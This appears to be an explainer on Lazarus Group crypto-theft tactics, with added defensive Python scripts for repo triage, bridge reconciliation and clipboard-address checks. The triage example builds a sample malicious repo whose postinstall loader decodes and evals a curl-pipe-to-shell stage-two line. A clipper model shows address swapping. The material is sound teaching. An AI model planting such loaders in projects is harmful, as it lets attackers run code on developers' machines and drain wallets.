Key Takeaways
North Korean crypto hacking has become one of the biggest security threats in digital assets. Lazarus Group, a North Korea-linked hacking group, has moved far beyond basic phishing emails. It now uses fake recruiters, fake crypto companies, malicious code libraries, and more to steal funds.
The threat is no longer hypothetical. The FBI said North Korea stole about $1.5 billion from Bybit in February 2025, then moved the assets across thousands of addresses.
Chainalysis later linked a roughly $292 million KelpDAO bridge exploit in April 2026 to Lazarus Group, while TRM Labs said North Korean hackers accounted for 76% of all crypto hack value through April 2026 with just two attacks: Drift Protocol and KelpDAO.
Lazarus rarely cashes out stolen funds all at once. Investigators tend to see quick swaps, wallet splitting, and mixers before any conversion into fiat. In the Bybit case, Chainalysis noted that intermediary wallets, decentralized exchanges (DEXs), cross-chain bridges, and no-KYC swap services were all used.
Mixers are a major part of the laundering chain. The US Treasury's Office of Terrorism and Financial Intelligence said Blender.io helped launder Axie Infinity proceeds and that Sinbad processed funds from Lazarus-linked thefts; Tornado Cash was accused of laundering more than $455 million tied to Lazarus before US sanctions were imposed. ChipMixer was taken down after allegedly processing more than $3 billion in unlawful transactions, including proceeds of state-sponsored crypto theft.
With that laundering pipeline in mind, here are seven less obvious Lazarus Group attack methods you should know.
Fake job offers remain one of the most dangerous Lazarus Group methods. Instead of sending obvious spam, attackers pretend to be recruiters, investors, or hiring managers. From there, they contact crypto-related workers through LinkedIn, Facebook, Reddit, or GitHub and ask them to open a file, clone a repository, or complete a “test task.”

Following the instructions runs the attacker's code, which installs malware on your device. The recent graphalgo campaign is an example: it used fake crypto job tasks and malicious npm/PyPI packages to target developers.
Lazarus also hides malware inside software that appears useful. A fake crypto trading app may include a remote access trojan (RAT) that lets attackers spy on your device and steal credentials.
The older AppleJeus campaign used malware posing as cryptocurrency trading platforms from at least 2018, with fake tools built for both Windows and macOS. More recent campaigns apply the same idea but split the payload into smaller pieces delivered through malicious dependencies and fake utilities such as graphalgo.
Before downloading any crypto-related software, check independent reviews and the project's GitHub history, and look at whether it asks for wallet access it does not need.
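As an added example (not code from this page, from graphalgo, or from any campaign it names), here is a small pre-install triage script a developer can run over a cloned "test task" repository before running `npm install`. It flags lifecycle hooks in package.json, which npm executes automatically during install, and a few source patterns that loader stubs in malicious packages commonly use: eval, base64 decoding, long encoded blobs, and child_process. The repository contents, the package name `graph-task`, and the file names are constructed for the example.

```python
"""Pre-install triage of a cloned "test task" repository (added example).

The sample repository below is constructed for this example; it is not the
graphalgo package or any real campaign artifact.
"""
import base64
import json
import re

# npm runs these automatically during `npm install`; a coding test has no reason to need them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Patterns typical of a small loader stub that decodes and runs a second stage.
SUSPICIOUS = [
    ("eval", re.compile(r"\beval\s*\(")),
    ("new Function", re.compile(r"new\s+Function\s*\(")),
    ("child_process", re.compile(r"require\(\s*['\"]child_process['\"]\s*\)")),
    ("base64 decode", re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\s*\)")),
    ("long base64 blob", re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]")),
]


def check_package_json(text):
    """Return the lifecycle hooks a package.json declares, if any."""
    scripts = json.loads(text).get("scripts", {})
    return {hook: scripts[hook] for hook in LIFECYCLE_HOOKS if hook in scripts}


def scan_source(text):
    """Return the names of suspicious patterns found in a JavaScript source file."""
    return [name for name, rx in SUSPICIOUS if rx.search(text)]


def triage(files):
    """Map path -> findings for every file that raised at least one flag."""
    findings = {}
    for path, content in files.items():
        if path.endswith("package.json"):
            hits = [f"lifecycle hook {h}: {cmd}" for h, cmd in check_package_json(content).items()]
        elif path.endswith(".js"):
            hits = scan_source(content)
        else:
            hits = []
        if hits:
            findings[path] = hits
    return findings


# Constructed second stage, encoded so the plaintext never appears in the repo.
_STAGE2 = b"require('child_process').exec('curl -s https://stage2.invalid/run | sh');" * 3
_BLOB = base64.b64encode(_STAGE2).decode()

# Constructed sample repository (assumption: the layout of a typical "test task").
SAMPLE_FILES = {
    "package.json": json.dumps({
        "name": "graph-task",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js", "test": "jest"},
    }),
    "setup.js": (
        'const payload = Buffer.from("' + _BLOB + '", "base64").toString("utf8");\n'
        "eval(payload);\n"
    ),
    "src/index.js": "module.exports = function shortestPath(graph, a, b) { return []; };\n",
}

if __name__ == "__main__":
    for path, hits in triage(SAMPLE_FILES).items():
        print(path)
        for hit in hits:
            print("  -", hit)
```

The scanner is a triage aid, not a verdict: a clean result only means none of these patterns were found. If you must install an unknown task, `npm install --ignore-scripts` prevents lifecycle hooks from running, and a throwaway VM with no wallets, SSH keys, or browser sessions limits what a missed stage can reach.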
Lazarus often attacks the people or systems around a smart contract rather than the contract itself. The Ronin Network hack showed how social engineering can change on-chain behaviour: attackers gained control of enough of the network's validator nodes to approve withdrawals that drained the bridge.
The 2026 KelpDAO attack was an updated version of this. Attackers compromised off-chain infrastructure and tricked a bridge into releasing funds against a burn that never happened. The on-chain transactions looked valid, so ordinary transaction monitoring did not flag them.

To reduce this risk, DeFi investors should check smart contract audits, bridge design, validator setup, and whether a protocol reconciles cross-chain balances in real time.
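As an added example of the real-time reconciliation the paragraph above asks about (not code from KelpDAO, from Lazarus, or from any real bridge), the script below reads burn events from the source chain and release events from the destination chain and flags any release that has no matching burn, any burn id released twice, and any token for which more has been released than burned. The events are constructed; the field names (`burn_id`, `token`, `amount`, `tx`) and the token symbols are assumptions.

```python
"""Cross-chain burn/release reconciliation (added example, constructed data)."""
from collections import defaultdict

# Constructed events, as an indexer might emit them. Amounts are integers in the
# token's smallest unit. burn_id is the assumed identifier carried in the bridge
# message so that a release can be tied back to the burn that authorised it.
SOURCE_BURNS = [
    {"burn_id": 1, "token": "rsETH", "amount": 1_000, "tx": "0xaaa1"},
    {"burn_id": 2, "token": "rsETH", "amount": 250, "tx": "0xaaa2"},
    {"burn_id": 3, "token": "USDC", "amount": 5_000, "tx": "0xaaa3"},
]
DEST_RELEASES = [
    {"burn_id": 1, "token": "rsETH", "amount": 1_000, "tx": "0xbbb1"},
    {"burn_id": 2, "token": "rsETH", "amount": 250, "tx": "0xbbb2"},
    {"burn_id": 3, "token": "USDC", "amount": 5_000, "tx": "0xbbb3"},
    # A release whose burn never happened on the source chain. The destination
    # transaction is well formed, so only reconciliation against the source
    # chain's own state catches it.
    {"burn_id": 4, "token": "rsETH", "amount": 40_000, "tx": "0xbbb4"},
]


def unmatched_releases(burns, releases):
    """Releases with no source-chain burn of the same id, token and amount,
    plus any release that reuses a burn id already consumed (replay)."""
    by_id = {b["burn_id"]: b for b in burns}
    consumed = set()
    bad = []
    for r in releases:
        b = by_id.get(r["burn_id"])
        if (b is None or b["token"] != r["token"] or b["amount"] != r["amount"]
                or r["burn_id"] in consumed):
            bad.append(r)
            continue
        consumed.add(r["burn_id"])
    return bad


def over_released(burns, releases):
    """Per token, released minus burned, for tokens where the bridge is net short."""
    net = defaultdict(int)
    for b in burns:
        net[b["token"]] -= b["amount"]
    for r in releases:
        net[r["token"]] += r["amount"]
    return {token: delta for token, delta in net.items() if delta > 0}


def check_bridge(burns, releases):
    """Return (healthy, unmatched_releases, over_released_per_token)."""
    unmatched = unmatched_releases(burns, releases)
    over = over_released(burns, releases)
    return (not unmatched and not over, unmatched, over)


if __name__ == "__main__":
    healthy, unmatched, over = check_bridge(SOURCE_BURNS, DEST_RELEASES)
    print("healthy:", healthy)
    for r in unmatched:
        print("release without matching burn:", r)
    print("over-released per token:", over)
```

The important design choice is where the burn events come from: the check must read them from the source chain itself, not from the attestation the bridge relays, because a compromised relayer is exactly what produces a release against a non-existent burn. The per-token invariant is the cheap alarm that still fires if the indexer misses an individual event.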
Supply chain attacks work because victims trust their software will work as intended. Instead of attacking you directly, hackers break into a tool or app that many people already use.
This is what happened in the 2023 3CX attack. Mandiant said the hackers first used a trojanized software installer from Trading Technologies. That compromised software then gave them a way into 3CX, a company that makes phone and communication tools. Mandiant said it was the first known case of one software supply chain attack leading to another, and linked the activity to a North Korea-related group.
As a user, you would never notice. Your app would ask for an update, the screen would look normal, and the update would deliver malware in the background.
Lazarus operators sometimes pose as useful business contacts: venture capital investors, market makers, legal advisors, or Web3 partners.
They attempt to earn your trust before sending anything dangerous, perhaps messaging you as a crypto founder on Telegram or sending a fake investment deck. They may also study your online presence ahead of time and send a personalized message, throwing you off guard.

In 2026, Lazarus-linked BlueNoroff used this method. Attackers posed as a fintech legal contact, sent victims a Calendly invite, then pushed them toward a fake Zoom link. Following the link let the attackers go after the victim's browser data and wallet extensions.
Browser and clipboard attacks are simple, but they can be very damaging.
You may copy a wallet address as normal, but malware will hijack your clipboard and change the address before you paste it. You might think you’re sending funds to a friend’s wallet, but instead the address belongs to an attacker.
BlueNoroff's fake Zoom campaign also used clipboard hijacking as part of the larger attack.
Your safest habit is to verify the wallet address before every transfer. Compare the first few and last few characters on your hardware wallet or trusted device screen, not just in the browser, and be aware that attackers also generate lookalike addresses that share exactly those characters, so compare the full address whenever you can. Also, remove browser extensions you no longer use, and never approve wallet pop-ups while you are on a call with someone pushing you to move fast.
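As an added example (not code from this page or from the BlueNoroff campaign), the snippet below models what clipper malware does to copied text and shows why checking only the first and last characters of an address is not enough: a lookalike address planted by the attacker shares exactly those characters. The addresses are constructed placeholders, not real wallets, and the `ends=4` comparison width is an assumption.

```python
"""Clipboard hijack model and a paste-time address check (added example)."""
import re

# Constructed placeholder addresses (not real wallets).
FRIEND = "0x1234" + "0" * 32 + "abcd"
LOOKALIKE = "0x1234" + "f" * 32 + "abcd"   # same ends as FRIEND, different middle
ATTACKER = "0x" + "9" * 40

# What a clipper looks for: EVM, bech32 and legacy Bitcoin address shapes.
ADDRESS_RX = re.compile(
    r"\b(0x[0-9a-fA-F]{40}|bc1[02-9ac-hj-np-z]{25,59}|[13][1-9A-HJ-NP-Za-km-z]{25,34})\b"
)


def hijack_clipboard(clip_text, attacker_address):
    """Model of clipper malware: rewrite every recognised address in the clipboard."""
    return ADDRESS_RX.sub(attacker_address, clip_text)


def verify_address(expected, pasted, ends=4):
    """Classify a pasted address against the one you meant to send to.

    'ok'        exact match
    'lookalike' first and last `ends` characters match but the middle differs;
                a check that only reads the ends would wrongly accept this
    'mismatch'  anything else, e.g. a clipper swapped in an unrelated address
    """
    if pasted == expected:
        return "ok"
    head = len("0x") + ends if expected.startswith("0x") else ends
    if pasted[:head] == expected[:head] and pasted[-ends:] == expected[-ends:]:
        return "lookalike"
    return "mismatch"


if __name__ == "__main__":
    copied = f"send 0.5 ETH to {FRIEND} please"
    print(hijack_clipboard(copied, ATTACKER))
    print(verify_address(FRIEND, ATTACKER))    # mismatch
    print(verify_address(FRIEND, LOOKALIKE))   # lookalike
```

A clipper is only a string substitution on the clipboard, which is why it survives any amount of care on the sending page: the swap happens between copy and paste. The "lookalike" result is the case that defeats an ends-only glance, so the comparison in the check above reads the whole string first and only falls back to the ends to explain the failure.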
Wallet recovery scams target people when they’re scared about losing their funds. After a hack, failed login, or wallet error, victims may search online for recovery help. Attackers use that moment to create fake recovery websites, support pages, and tools that promise to restore your lost funds.
The Atomic Wallet hack is a major investor-facing example: losses reached around $100 million, investigators linked the incident to Lazarus Group, and more than 5,000 wallets appeared to be affected.
Here’s a quick checklist to help mitigate theft:
But perhaps most importantly, assume Lazarus Group crypto attacks aim at your trust. They want you to trust a job offer, a meeting invite, a software update. Slow down before committing to actions that affect your keys.
Lazarus targets crypto because it moves fast, crosses borders, and is hard to recover once stolen. Officials say North Korea uses stolen crypto to support state activity. Linked cases include Ronin/Axie Infinity, Harmony Horizon, Atomic Wallet, Stake.com, Bybit, and KelpDAO. Investigators follow wallet activity, swaps, bridges, and exchange deposits across public blockchains, and work with exchanges to freeze stolen funds. Watch for fake job offers, urgent test tasks, fake links, strange wallet prompts, changed wallet addresses, and anyone asking for your seed phrase.